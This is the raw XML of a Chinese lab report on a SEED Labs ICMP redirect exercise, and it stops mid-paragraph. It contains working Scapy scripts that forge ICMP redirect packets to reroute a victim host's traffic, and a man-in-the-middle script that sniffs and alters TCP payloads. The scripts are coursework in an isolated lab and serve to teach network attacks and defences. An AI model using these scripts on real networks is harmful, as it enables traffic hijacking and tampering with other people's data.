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2D870" w14:textId="3190982F" w:rsidR="00C32D2F" w:rsidRDefault="00405737">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ASK 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B0C30" w14:textId="1C1D29C4" w:rsidR="00405737" w:rsidRDefault="00405737">
      <w:pPr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89FE5A" wp14:editId="3E27B428">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>251460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>213360</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2280920"/>
            <wp:effectExtent l="0" t="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首先未攻击前查看受害者主机的默认路由</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1F87E" w14:textId="63D8B9D0" w:rsidR="00BC2B40" w:rsidRDefault="00BC2B40">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C5D4D49" wp14:editId="69A74EA5">
            <wp:extent cx="5274310" cy="853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E27B" w14:textId="5B0425E8" w:rsidR="00405737" w:rsidRDefault="009455BC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察发现当前</w:t>
      </w:r>
      <w:r w:rsidR="00390FAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发往1</w:t>
      </w:r>
      <w:r w:rsidR="00390FAC">
        <w:t>92.168.60.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00390FAC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidR="009C0581">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158E50E" w14:textId="2E57FF5F" w:rsidR="009455BC" w:rsidRDefault="009455BC" w:rsidP="009455BC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="009455BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造</w:t>
      </w:r>
      <w:r w:rsidRPr="009455BC">
        <w:t>ICMP重定向数据包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50363F17" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F39FC" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65005036" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CB54C6" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ip = IP(src = "10.9.0.11",  dst = "10.9.0.5") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8019A7" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>icmp = ICMP(type=5, code=0) #Redirect for network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6500D2" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>icmp.gw = "10.9.0.111"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD5A60" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t># The enclosed IP packet should be the one that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE0BF70" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t># triggers the redirect message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481CE5C2" w14:textId="77777777" w:rsidR="009A5D1E" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>ip2 = IP(src = "10.9.0.5", dst = "192.168.60.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ECB6E2" w14:textId="47B9433C" w:rsidR="009455BC" w:rsidRDefault="009A5D1E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>send(ip/icmp/ip2/ICMP());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29551FF4" w14:textId="23616F07" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ping时运行程序，查看路由缓存，结果如下，成功重定向</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D86F49" w14:textId="6BED2FA4" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A67DC3A" wp14:editId="26735300">
            <wp:extent cx="5274310" cy="495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8717" w14:textId="1CD1D2B6" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388D6264" w14:textId="72C79F22" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30E358" w14:textId="6A9C7546" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0581">
        <w:t>icmp.gw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.60.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新运行查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BE9A8" w14:textId="661ABE2D" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29AD94A4" wp14:editId="29F639F9">
            <wp:extent cx="5274310" cy="614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B172" w14:textId="0E73E009" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到路由位置不正确，缓存变为默认网关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443D7DBA" w14:textId="060D1D65" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402D507B" w14:textId="25755FA5" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E2F211" w14:textId="4A29FB54" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>问题2：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDA1CD" w14:textId="12BB0C8A" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009C0581">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0581">
        <w:t>icmp.gw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.66</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，重新运行查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B9FE1" w14:textId="5556C360" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339EF10E" wp14:editId="739279C7">
            <wp:extent cx="4968671" cy="59441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0BEB" w14:textId="1F037543" w:rsidR="009C0581" w:rsidRDefault="009C0581" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到路由地址不存在，变为默认网关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B63BAB" w14:textId="36050E81" w:rsidR="004A2D32" w:rsidRDefault="004A2D32" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题3：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A399C" w14:textId="7B6C551F" w:rsidR="00852D83" w:rsidRDefault="00852D83" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将与重定向有关的三个参数的值设置为1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D405C" w14:textId="67B027C8" w:rsidR="004A2D32" w:rsidRDefault="00852D83" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BF304FB" wp14:editId="7DDD835A">
            <wp:extent cx="5274310" cy="18853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9C9F" w14:textId="2D3C86C8" w:rsidR="00852D83" w:rsidRDefault="00852D83" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>重新执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B7DE0" w14:textId="13F0227A" w:rsidR="00852D83" w:rsidRDefault="00852D83" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6752CC" wp14:editId="79219B43">
            <wp:extent cx="5274310" cy="8928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13AF" w14:textId="2A439178" w:rsidR="00852D83" w:rsidRDefault="00852D83" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有路由缓存</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，原因在于</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE" w:rsidRPr="000A75EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果主机所在的网络有多个路由器，系统将其中一个设为缺省网关，但该网关在收到主机发送</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE" w:rsidRPr="000A75EE">
        <w:t>ip包时，发现该ip包必须经过另外一个路由器，于是该网关就給</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE" w:rsidRPr="000A75EE">
        <w:t>主机发一个“重定向”的icmp包，告诉主机把包转发到另外一个路由器。1表示主机接受这样的重定向包，0表示忽略</w:t>
      </w:r>
      <w:r w:rsidR="000A75EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，于是修改就没有生效，因为包被重新发给了默认路由。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D306103" w14:textId="36A4EDD2" w:rsidR="00FB192E" w:rsidRDefault="00FB192E" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70446B20" w14:textId="16E8ABEE" w:rsidR="00537816" w:rsidRDefault="00537816" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ASK 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77187C7C" w14:textId="209B41EB" w:rsidR="00537816" w:rsidRDefault="00537816" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，恶意路由上禁用I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C94F5" w14:textId="61604B27" w:rsidR="00537816" w:rsidRDefault="00537816" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E4D13CC" wp14:editId="009B5032">
            <wp:extent cx="5274310" cy="13855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5664" w14:textId="1B6F6500" w:rsidR="00537816" w:rsidRDefault="00537816" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B826620" w14:textId="079FA84F" w:rsidR="00530E67" w:rsidRDefault="00530E67" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重启docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6BDA3A" w14:textId="4298C43C" w:rsidR="003B020D" w:rsidRDefault="003B020D" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在重定向的基础上，在</w:t>
      </w:r>
      <w:r w:rsidR="007F61DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上执行M</w:t>
      </w:r>
      <w:r>
        <w:t>ITM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06769C43" w14:textId="226B1BE4" w:rsidR="00530E67" w:rsidRDefault="00530E67" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害者主机和目的主机进行T</w:t>
      </w:r>
      <w:r>
        <w:t>CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4ACE49" w14:textId="02D8BBC9" w:rsidR="00530E67" w:rsidRDefault="00530E67" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA8CBC3" w14:textId="39E417C4" w:rsidR="00530E67" w:rsidRDefault="00530E67" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E709BC2" wp14:editId="36CB9499">
            <wp:extent cx="5274310" cy="23101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7FCA" w14:textId="19B8F09B" w:rsidR="00537816" w:rsidRDefault="00530E67" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试发现连接成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762546CB" w14:textId="59D5C87E" w:rsidR="00530E67" w:rsidRDefault="003B020D" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当输入特定数值时，数据会被纂改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79797E95" w14:textId="66A8CE95" w:rsidR="003B020D" w:rsidRDefault="003B020D" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="073F1555" wp14:editId="38C4882C">
            <wp:extent cx="5274310" cy="2247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18B8" w14:textId="7C5436E1" w:rsidR="003B020D" w:rsidRDefault="003B020D" w:rsidP="009A5D1E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E69A15" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B1F596" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54277327" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08797C15" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>print("LAUNCHING MITM ATTACK.........")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799EE19" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274FFEF7" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>def spoof_pkt(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F500F4" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   newpkt = IP(bytes(pkt[IP]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C326576" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   del(newpkt.chksum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B2B05" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   del(newpkt[TCP].payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5E3FC6" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   del(newpkt[TCP].chksum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C16A6A" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771C5C64" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   if pkt[TCP].payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16115A26" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       data = pkt[TCP].payload.load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC13FC" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       print("*** %s, length: %d" % (data, len(data)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74577C84" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B50C937" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       # Replace a pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45442729" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       newdata = data.replace(b'seedlabs', b'AAAAAAAA')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629F241D" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E394CAC" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       send(newpkt/newdata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F17AF" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   else: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C6D10" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       send(newpkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270EC81" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="712E0E11" w14:textId="77777777" w:rsidR="00FE013E" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">f = 'tcp and ether src 02:42:0a:09:00:05' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2D47C1" w14:textId="0EDE9019" w:rsidR="003B020D" w:rsidRDefault="00FE013E" w:rsidP="00FE013E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>pkt = sniff(iface='eth0', filter=f, prn=spoof_pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338F71B9" w14:textId="1F5122FF" w:rsidR="005E66E5" w:rsidRDefault="005E66E5" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>问题4：在M</w:t>
      </w:r>
      <w:r>
        <w:t>ITM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序中，只需要捕捉去往目的主机，即1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.60.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的流量，因为这个方向的流量上有携带了受害者主机输入数据的报文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8568C" w14:textId="502942FD" w:rsidR="00423BF0" w:rsidRDefault="00423BF0" w:rsidP="003B020D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
